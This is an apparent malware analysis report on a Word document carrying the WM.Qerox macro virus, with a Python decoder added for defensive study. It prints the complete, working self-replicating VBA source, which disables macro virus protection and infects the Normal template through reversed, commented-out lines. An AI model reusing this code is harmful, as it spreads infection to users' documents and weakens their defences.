Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9f5052724ef1f25a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 52.5 KB
Created: 2001-06-10 23:26:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 6728b03f483ff23fb436d7260a5d90b7
SHA-1: 10d5f27653a0e2d2def74d23beeebe5d856198f2
SHA-256: 9f5052724ef1f25a8439eb6a3c60c1e3ab7d4e1fa3bbd73b81ad367ba6728943
Risk Score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros with a Document_Open handler, which Word runs automatically when the document is opened, and a document_close handler that runs when it is closed. The extracted source explains why the visible Document_Open body looks like a block of comments while the p-code heuristic still fired on execution-style tokens: the body is stored as commented-out, character-reversed lines, and document_close strips the apostrophe, reverses each line back, calls Document_Open, and then re-encodes the lines (the "String Reverse Mutation Engine", SRME, named in the trailing comment). Decoded, Document_Open sets Options.VirusProtection to 0 and copies the module's source into the VBA project of both the Normal template and the active document unless the "'String2K" marker is already present. That is classic self-replicating Word macro-virus behaviour (the source names itself WM.Qerox); no network, shell or object-creation call appears in the decoded source, so the execution tokens the heuristic matched are the VBProject/CodeModule manipulation rather than a downloader stage. The ClamAV detection 'Doc.Trojan.Zina-3' corroborates the malicious verdict.

Heuristics 4

  • ClamAV: Doc.Trojan.Zina-3 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Zina-3
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro, executed automatically when the document is opened
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample the source did extract (macros.bas below); once the reversed Document_Open lines are decoded they contain VBProject/CodeModule manipulation and an Options.VirusProtection write, but no download or shell call.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2721 bytes
SHA-256: 7aef83daa9c6b1307ba232df57a42163b1589784586e471d98011b40afdc2031
Detection
ClamAV: Doc.Trojan.Zina-3
Obfuscation or payload: unlikely (automated verdict; note that the Document_Open body is in fact stored as commented-out, reversed lines that document_close decodes at run time, see the preview below)
Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'String2K
Dim a23489245, b23489234, c76394729, d39848275, e72945601, f92038476
Dim g50385723, h84729645, i84729645, j40395423, k02391836, l20654583, m29387656
Dim n74359023, o09324687, p98734985, r90809564
Private Sub Document_Open()
'etalpmeTlamroN.noitacilppA = 43298432b teS :tnemucoDevitcA.noitacilppA = 54298432a teS
')57284893d - 57284893d( = noitcetorPsuriV.snoitpO :1 = 57284893d :tnemucoDsihT = 92749367c teS
'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.43298432b = 63819320k teS
'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.54298432a = 32095347n teS
'_ ,57284893d(seniL.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c = 10654927e
')senilfotnuoc.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c
'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.63819320k fI
'senilfotnuoc.63819320k ,57284893d senileteled.63819320k
'10654927e gnirtsmorfdda.63819320k
'fI dnE
'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.32095347n fI
'senilfotnuoc.32095347n ,57284893d senileteled.32095347n
'10654927e gnirtsmorfdda.32095347n
'fI dnE
End Sub
Private Sub document_close(): h84729645 = "'": d39848275 = 1: Dim a23, b34
If Left(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(17, d39848275), d39848275) = h84729645 Then
For j40395423 = 6 To 19
m29387656 = Right(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(j40395423, d39848275), Len(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(j40395423, d39848275)) - d39848275)
ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline j40395423, m29387656
Next
For o09324687 = 6 To 19
p98734985 = ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(o09324687, d39848275)
r90809564 = StrReverse(p98734985): ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline o09324687, r90809564: r90809564 = ""
Next
End If
Document_Open
If Left(ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(d39848275 + 6, d39848275), d39848275) <> h84729645 Then
For g50385723 = 6 To 19:  i84729645 = ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.Lines(g50385723, d39848275)
l20654583 = StrReverse(i84729645)
ThisDocument.VBProject.vbcomponents(d39848275).CodeModule.replaceline g50385723, h84729645 & l20654583
l20654583 = ""
Next
End If
End Sub
'Virus Name: WM.Qerox
'Author Name: Specie
'SRME v1.0 by Specie [String Reverse Mutation Engine]
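To show what the commented-out, reversed lines in Document_Open actually do, and what a source-level version of the auto-exec plus execution-token check (the idea behind OLE_VBA_PCODE_AUTOEXEC_EXEC) sees once they are decoded, here is an added Python example; it is not the analysis pipeline's code and not part of the sample. It embeds the Document_Open procedure copied from the macros.bas preview above, undoes the SRME transform the same way document_close does (strip the leading apostrophe, StrReverse each line), and classifies the decoded lines. The token lists it uses are this example's own assumption, not the pipeline's rule logic.

```python
"""Decode the SRME (String Reverse Mutation Engine) layer of the WM.Qerox
macro above and classify the decoded Document_Open body.

Added example for this report; not the analysis pipeline's code.
MACRO_SOURCE is the Document_Open procedure (plus the 'String2K infection
marker) copied from the macros.bas preview. The indicator lists are this
example's own assumptions about what to flag.
"""
import re

# Document_Open as stored in the document: each body line is commented out
# and character-reversed. document_close strips the "'" and StrReverse()s
# the body lines (module lines 6-19 in the full module) before calling
# Document_Open, then re-encodes them afterwards.
MACRO_SOURCE = r"""'String2K
Private Sub Document_Open()
'etalpmeTlamroN.noitacilppA = 43298432b teS :tnemucoDevitcA.noitacilppA = 54298432a teS
')57284893d - 57284893d( = noitcetorPsuriV.snoitpO :1 = 57284893d :tnemucoDsihT = 92749367c teS
'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.43298432b = 63819320k teS
'eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.54298432a = 32095347n teS
'_ ,57284893d(seniL.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c = 10654927e
')senilfotnuoc.eludoMedoC.)57284893d(stnenopmocbv.tcejorPBV.92749367c
'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.63819320k fI
'senilfotnuoc.63819320k ,57284893d senileteled.63819320k
'10654927e gnirtsmorfdda.63819320k
'fI dnE
'nehT "K2gnirtS'" >< )57284893d ,57284893d(seniL.32095347n fI
'senilfotnuoc.32095347n ,57284893d senileteled.32095347n
'10654927e gnirtsmorfdda.32095347n
'fI dnE
End Sub
"""

# Assumed indicator lists (this example's choice, not the pipeline's rules).
AUTO_EXEC = {"document_open", "document_close", "document_new", "autoopen",
             "autoclose", "autoexec", "autonew", "autoexit"}
SELF_MODIFY = ["VBProject", "CodeModule", "AddFromString", "DeleteLines",
               "ReplaceLine", "InsertLines"]
PROTECTION_TAMPER = ["VirusProtection", "SaveNormalPrompt", "ConfirmConversions"]
DOWNLOAD_EXEC = ["CreateObject", "Shell", "URLDownloadToFile", "XMLHTTP",
                 "ADODB.Stream", "WScript", "powershell", "cmd.exe"]


def srme_decode_line(line: str) -> str:
    """Undo one SRME-encoded line: drop the leading apostrophe, then reverse."""
    stripped = line.lstrip()
    if not stripped.startswith("'"):
        return line  # already plain code
    return stripped[1:][::-1]


def srme_encode_line(line: str) -> str:
    """Re-encode a plain line the way document_close does after running it."""
    return "'" + line[::-1]


def procedure_body(source: str, name: str) -> list:
    """Lines between 'Sub <name>(' and the next 'End Sub' (VBA is case-insensitive)."""
    header = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+" + re.escape(name) + r"\s*\(", re.I)
    body, inside = [], False
    for line in source.splitlines():
        if inside:
            if re.match(r"^\s*End\s+Sub\b", line, re.I):
                break
            body.append(line)
        elif header.match(line):
            inside = True
    return body


def decode_document_open(source: str) -> list:
    return [srme_decode_line(ln) for ln in procedure_body(source, "Document_Open")]


def auto_exec_procedures(source: str) -> list:
    """Names of Sub procedures that Word runs automatically."""
    names = re.findall(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)", source, re.I | re.M)
    return sorted(n for n in names if n.lower() in AUTO_EXEC)


def classify(decoded_lines: list) -> dict:
    """Token classification over decoded source; empty download_or_exec means
    the 'execution tokens' are code-module manipulation, not a downloader."""
    text = "\n".join(decoded_lines)

    def hits(tokens):
        return sorted(t for t in tokens if re.search(re.escape(t), text, re.I))

    return {
        "self_modifying_vba": hits(SELF_MODIFY),
        "protection_tamper": hits(PROTECTION_TAMPER),
        "download_or_exec": hits(DOWNLOAD_EXEC),
        "replicates_to_normal_template": "NormalTemplate" in text,
        "infection_marker_check": "'String2K" in text,
    }


if __name__ == "__main__":
    decoded = decode_document_open(MACRO_SOURCE)
    print("auto-exec procedures:", auto_exec_procedures(MACRO_SOURCE))
    for ln in decoded:
        print("   ", ln)
    for key, value in classify(decoded).items():
        print(f"{key}: {value}")
```

Running it prints the decoded Document_Open (Set a23489245 = Application.ActiveDocument, Options.VirusProtection = 0, DeleteLines/AddFromString into the Normal template's and the active document's first VB component) and a classification with an empty download_or_exec list; srme_encode_line round-trips a decoded line back to the exact stored form, which is the mutation step document_close performs after infection.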